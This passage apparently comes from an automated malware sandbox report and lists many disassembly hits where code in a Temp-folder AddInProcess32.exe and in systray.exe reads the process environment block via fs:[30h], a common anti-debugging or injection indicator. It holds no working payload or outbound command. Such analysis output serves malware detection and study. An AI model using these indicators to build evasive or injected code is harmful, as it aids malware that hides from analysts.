Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BC600 mov eax, dword ptr fs:[00000030h]	11_2_017BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BC600 mov eax, dword ptr fs:[00000030h]	11_2_017BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017BC600 mov eax, dword ptr fs:[00000030h]	11_2_017BC600
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E8E00 mov eax, dword ptr fs:[00000030h]	11_2_017E8E00
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_01871608 mov eax, dword ptr fs:[00000030h]	11_2_01871608
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E16E0 mov ecx, dword ptr fs:[00000030h]	11_2_017E16E0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017C76E2 mov eax, dword ptr fs:[00000030h]	11_2_017C76E2
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017E36CC mov eax, dword ptr fs:[00000030h]	11_2_017E36CC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_017F8EC7 mov eax, dword ptr fs:[00000030h]	11_2_017F8EC7
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0186FE3F mov eax, dword ptr fs:[00000030h]	11_2_0186FE3F
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187AE44 mov eax, dword ptr fs:[00000030h]	11_2_0187AE44
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe	Code function: 11_2_0187AE44 mov eax, dword ptr fs:[00000030h]	11_2_0187AE44
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AA44B mov eax, dword ptr fs:[00000030h]	17_2_045AA44B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460C450 mov eax, dword ptr fs:[00000030h]	17_2_0460C450
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460C450 mov eax, dword ptr fs:[00000030h]	17_2_0460C450
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459746D mov eax, dword ptr fs:[00000030h]	17_2_0459746D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6C0A mov eax, dword ptr fs:[00000030h]	17_2_045F6C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6C0A mov eax, dword ptr fs:[00000030h]	17_2_045F6C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6C0A mov eax, dword ptr fs:[00000030h]	17_2_045F6C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6C0A mov eax, dword ptr fs:[00000030h]	17_2_045F6C0A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631C06 mov eax, dword ptr fs:[00000030h]	17_2_04631C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464740D mov eax, dword ptr fs:[00000030h]	17_2_0464740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464740D mov eax, dword ptr fs:[00000030h]	17_2_0464740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464740D mov eax, dword ptr fs:[00000030h]	17_2_0464740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045ABC2C mov eax, dword ptr fs:[00000030h]	17_2_045ABC2C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046314FB mov eax, dword ptr fs:[00000030h]	17_2_046314FB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6CF0 mov eax, dword ptr fs:[00000030h]	17_2_045F6CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6CF0 mov eax, dword ptr fs:[00000030h]	17_2_045F6CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6CF0 mov eax, dword ptr fs:[00000030h]	17_2_045F6CF0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04648CD6 mov eax, dword ptr fs:[00000030h]	17_2_04648CD6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458849B mov eax, dword ptr fs:[00000030h]	17_2_0458849B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04597D50 mov eax, dword ptr fs:[00000030h]	17_2_04597D50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B3D43 mov eax, dword ptr fs:[00000030h]	17_2_045B3D43
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F3540 mov eax, dword ptr fs:[00000030h]	17_2_045F3540
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04623D40 mov eax, dword ptr fs:[00000030h]	17_2_04623D40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459C577 mov eax, dword ptr fs:[00000030h]	17_2_0459C577
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459C577 mov eax, dword ptr fs:[00000030h]	17_2_0459C577
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04648D34 mov eax, dword ptr fs:[00000030h]	17_2_04648D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463E539 mov eax, dword ptr fs:[00000030h]	17_2_0463E539
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A4D3B mov eax, dword ptr fs:[00000030h]	17_2_045A4D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A4D3B mov eax, dword ptr fs:[00000030h]	17_2_045A4D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A4D3B mov eax, dword ptr fs:[00000030h]	17_2_045A4D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457AD30 mov eax, dword ptr fs:[00000030h]	17_2_0457AD30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045FA537 mov eax, dword ptr fs:[00000030h]	17_2_045FA537
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04583D34 mov eax, dword ptr fs:[00000030h]	17_2_04583D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0463FDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0463FDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0463FDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463FDE2 mov eax, dword ptr fs:[00000030h]	17_2_0463FDE2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04628DF1 mov eax, dword ptr fs:[00000030h]	17_2_04628DF1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6DC9 mov eax, dword ptr fs:[00000030h]	17_2_045F6DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6DC9 mov eax, dword ptr fs:[00000030h]	17_2_045F6DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6DC9 mov eax, dword ptr fs:[00000030h]	17_2_045F6DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6DC9 mov ecx, dword ptr fs:[00000030h]	17_2_045F6DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6DC9 mov eax, dword ptr fs:[00000030h]	17_2_045F6DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F6DC9 mov eax, dword ptr fs:[00000030h]	17_2_045F6DC9
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458D5E0 mov eax, dword ptr fs:[00000030h]	17_2_0458D5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458D5E0 mov eax, dword ptr fs:[00000030h]	17_2_0458D5E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AFD9B mov eax, dword ptr fs:[00000030h]	17_2_045AFD9B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AFD9B mov eax, dword ptr fs:[00000030h]	17_2_045AFD9B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046405AC mov eax, dword ptr fs:[00000030h]	17_2_046405AC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046405AC mov eax, dword ptr fs:[00000030h]	17_2_046405AC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A2581 mov eax, dword ptr fs:[00000030h]	17_2_045A2581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A2581 mov eax, dword ptr fs:[00000030h]	17_2_045A2581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A2581 mov eax, dword ptr fs:[00000030h]	17_2_045A2581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A2581 mov eax, dword ptr fs:[00000030h]	17_2_045A2581
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04572D8A mov eax, dword ptr fs:[00000030h]	17_2_04572D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04572D8A mov eax, dword ptr fs:[00000030h]	17_2_04572D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04572D8A mov eax, dword ptr fs:[00000030h]	17_2_04572D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04572D8A mov eax, dword ptr fs:[00000030h]	17_2_04572D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04572D8A mov eax, dword ptr fs:[00000030h]	17_2_04572D8A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A1DB5 mov eax, dword ptr fs:[00000030h]	17_2_045A1DB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A1DB5 mov eax, dword ptr fs:[00000030h]	17_2_045A1DB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A1DB5 mov eax, dword ptr fs:[00000030h]	17_2_045A1DB5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A35A1 mov eax, dword ptr fs:[00000030h]	17_2_045A35A1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04587E41 mov eax, dword ptr fs:[00000030h]	17_2_04587E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04587E41 mov eax, dword ptr fs:[00000030h]	17_2_04587E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04587E41 mov eax, dword ptr fs:[00000030h]	17_2_04587E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04587E41 mov eax, dword ptr fs:[00000030h]	17_2_04587E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04587E41 mov eax, dword ptr fs:[00000030h]	17_2_04587E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04587E41 mov eax, dword ptr fs:[00000030h]	17_2_04587E41
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463AE44 mov eax, dword ptr fs:[00000030h]	17_2_0463AE44
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0463AE44 mov eax, dword ptr fs:[00000030h]	17_2_0463AE44
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459AE73 mov eax, dword ptr fs:[00000030h]	17_2_0459AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459AE73 mov eax, dword ptr fs:[00000030h]	17_2_0459AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459AE73 mov eax, dword ptr fs:[00000030h]	17_2_0459AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459AE73 mov eax, dword ptr fs:[00000030h]	17_2_0459AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459AE73 mov eax, dword ptr fs:[00000030h]	17_2_0459AE73
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458766D mov eax, dword ptr fs:[00000030h]	17_2_0458766D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AA61C mov eax, dword ptr fs:[00000030h]	17_2_045AA61C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AA61C mov eax, dword ptr fs:[00000030h]	17_2_045AA61C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457C600 mov eax, dword ptr fs:[00000030h]	17_2_0457C600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457C600 mov eax, dword ptr fs:[00000030h]	17_2_0457C600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457C600 mov eax, dword ptr fs:[00000030h]	17_2_0457C600
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A8E00 mov eax, dword ptr fs:[00000030h]	17_2_045A8E00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0462FE3F mov eax, dword ptr fs:[00000030h]	17_2_0462FE3F
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04631608 mov eax, dword ptr fs:[00000030h]	17_2_04631608
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457E620 mov eax, dword ptr fs:[00000030h]	17_2_0457E620
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A36CC mov eax, dword ptr fs:[00000030h]	17_2_045A36CC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B8EC7 mov eax, dword ptr fs:[00000030h]	17_2_045B8EC7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0462FEC0 mov eax, dword ptr fs:[00000030h]	17_2_0462FEC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04648ED6 mov eax, dword ptr fs:[00000030h]	17_2_04648ED6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A16E0 mov ecx, dword ptr fs:[00000030h]	17_2_045A16E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045876E2 mov eax, dword ptr fs:[00000030h]	17_2_045876E2
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04640EA5 mov eax, dword ptr fs:[00000030h]	17_2_04640EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04640EA5 mov eax, dword ptr fs:[00000030h]	17_2_04640EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04640EA5 mov eax, dword ptr fs:[00000030h]	17_2_04640EA5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460FE87 mov eax, dword ptr fs:[00000030h]	17_2_0460FE87
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F46A7 mov eax, dword ptr fs:[00000030h]	17_2_045F46A7
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04648F6A mov eax, dword ptr fs:[00000030h]	17_2_04648F6A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458EF40 mov eax, dword ptr fs:[00000030h]	17_2_0458EF40
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458FF60 mov eax, dword ptr fs:[00000030h]	17_2_0458FF60
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459F716 mov eax, dword ptr fs:[00000030h]	17_2_0459F716
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AA70E mov eax, dword ptr fs:[00000030h]	17_2_045AA70E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AA70E mov eax, dword ptr fs:[00000030h]	17_2_045AA70E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464070D mov eax, dword ptr fs:[00000030h]	17_2_0464070D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0464070D mov eax, dword ptr fs:[00000030h]	17_2_0464070D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AE730 mov eax, dword ptr fs:[00000030h]	17_2_045AE730
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460FF10 mov eax, dword ptr fs:[00000030h]	17_2_0460FF10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460FF10 mov eax, dword ptr fs:[00000030h]	17_2_0460FF10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04574F2E mov eax, dword ptr fs:[00000030h]	17_2_04574F2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04574F2E mov eax, dword ptr fs:[00000030h]	17_2_04574F2E
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B37F5 mov eax, dword ptr fs:[00000030h]	17_2_045B37F5
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F7794 mov eax, dword ptr fs:[00000030h]	17_2_045F7794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F7794 mov eax, dword ptr fs:[00000030h]	17_2_045F7794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F7794 mov eax, dword ptr fs:[00000030h]	17_2_045F7794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04588794 mov eax, dword ptr fs:[00000030h]	17_2_04588794
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04590050 mov eax, dword ptr fs:[00000030h]	17_2_04590050
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04590050 mov eax, dword ptr fs:[00000030h]	17_2_04590050
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04632073 mov eax, dword ptr fs:[00000030h]	17_2_04632073
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04641074 mov eax, dword ptr fs:[00000030h]	17_2_04641074
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F7016 mov eax, dword ptr fs:[00000030h]	17_2_045F7016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F7016 mov eax, dword ptr fs:[00000030h]	17_2_045F7016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F7016 mov eax, dword ptr fs:[00000030h]	17_2_045F7016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459A830 mov eax, dword ptr fs:[00000030h]	17_2_0459A830
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459A830 mov eax, dword ptr fs:[00000030h]	17_2_0459A830
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459A830 mov eax, dword ptr fs:[00000030h]	17_2_0459A830
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459A830 mov eax, dword ptr fs:[00000030h]	17_2_0459A830
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04644015 mov eax, dword ptr fs:[00000030h]	17_2_04644015
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04644015 mov eax, dword ptr fs:[00000030h]	17_2_04644015
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458B02A mov eax, dword ptr fs:[00000030h]	17_2_0458B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458B02A mov eax, dword ptr fs:[00000030h]	17_2_0458B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458B02A mov eax, dword ptr fs:[00000030h]	17_2_0458B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0458B02A mov eax, dword ptr fs:[00000030h]	17_2_0458B02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A002D mov eax, dword ptr fs:[00000030h]	17_2_045A002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A002D mov eax, dword ptr fs:[00000030h]	17_2_045A002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A002D mov eax, dword ptr fs:[00000030h]	17_2_045A002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A002D mov eax, dword ptr fs:[00000030h]	17_2_045A002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A002D mov eax, dword ptr fs:[00000030h]	17_2_045A002D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0460B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460B8D0 mov ecx, dword ptr fs:[00000030h]	17_2_0460B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0460B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0460B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0460B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0460B8D0 mov eax, dword ptr fs:[00000030h]	17_2_0460B8D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045740E1 mov eax, dword ptr fs:[00000030h]	17_2_045740E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045740E1 mov eax, dword ptr fs:[00000030h]	17_2_045740E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045740E1 mov eax, dword ptr fs:[00000030h]	17_2_045740E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045758EC mov eax, dword ptr fs:[00000030h]	17_2_045758EC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459B8E4 mov eax, dword ptr fs:[00000030h]	17_2_0459B8E4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459B8E4 mov eax, dword ptr fs:[00000030h]	17_2_0459B8E4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04579080 mov eax, dword ptr fs:[00000030h]	17_2_04579080
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F3884 mov eax, dword ptr fs:[00000030h]	17_2_045F3884
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045F3884 mov eax, dword ptr fs:[00000030h]	17_2_045F3884
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AF0BF mov ecx, dword ptr fs:[00000030h]	17_2_045AF0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AF0BF mov eax, dword ptr fs:[00000030h]	17_2_045AF0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045AF0BF mov eax, dword ptr fs:[00000030h]	17_2_045AF0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045B90AF mov eax, dword ptr fs:[00000030h]	17_2_045B90AF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0 mov eax, dword ptr fs:[00000030h]	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0 mov eax, dword ptr fs:[00000030h]	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0 mov eax, dword ptr fs:[00000030h]	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0 mov eax, dword ptr fs:[00000030h]	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0 mov eax, dword ptr fs:[00000030h]	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A20A0 mov eax, dword ptr fs:[00000030h]	17_2_045A20A0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459B944 mov eax, dword ptr fs:[00000030h]	17_2_0459B944
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0459B944 mov eax, dword ptr fs:[00000030h]	17_2_0459B944
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457B171 mov eax, dword ptr fs:[00000030h]	17_2_0457B171
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457B171 mov eax, dword ptr fs:[00000030h]	17_2_0457B171
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457C962 mov eax, dword ptr fs:[00000030h]	17_2_0457C962
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04579100 mov eax, dword ptr fs:[00000030h]	17_2_04579100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04579100 mov eax, dword ptr fs:[00000030h]	17_2_04579100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04579100 mov eax, dword ptr fs:[00000030h]	17_2_04579100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A513A mov eax, dword ptr fs:[00000030h]	17_2_045A513A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_045A513A mov eax, dword ptr fs:[00000030h]	17_2_045A513A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04594120 mov eax, dword ptr fs:[00000030h]	17_2_04594120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04594120 mov eax, dword ptr fs:[00000030h]	17_2_04594120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04594120 mov eax, dword ptr fs:[00000030h]	17_2_04594120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04594120 mov eax, dword ptr fs:[00000030h]	17_2_04594120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_04594120 mov ecx, dword ptr fs:[00000030h]	17_2_04594120
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046041E8 mov eax, dword ptr fs:[00000030h]	17_2_046041E8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457B1E1 mov eax, dword ptr fs:[00000030h]	17_2_0457B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457B1E1 mov eax, dword ptr fs:[00000030h]	17_2_0457B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_0457B1E1 mov eax, dword ptr fs:[00000030h]	17_2_0457B1E1
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046349A4 mov eax, dword ptr fs:[00000030h]	17_2_046349A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046349A4 mov eax, dword ptr fs:[00000030h]	17_2_046349A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046349A4 mov eax, dword ptr fs:[00000030h]	17_2_046349A4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 17_2_046349A4 mov eax, dword ptr fs:[00000030h]	17_2_046349A4
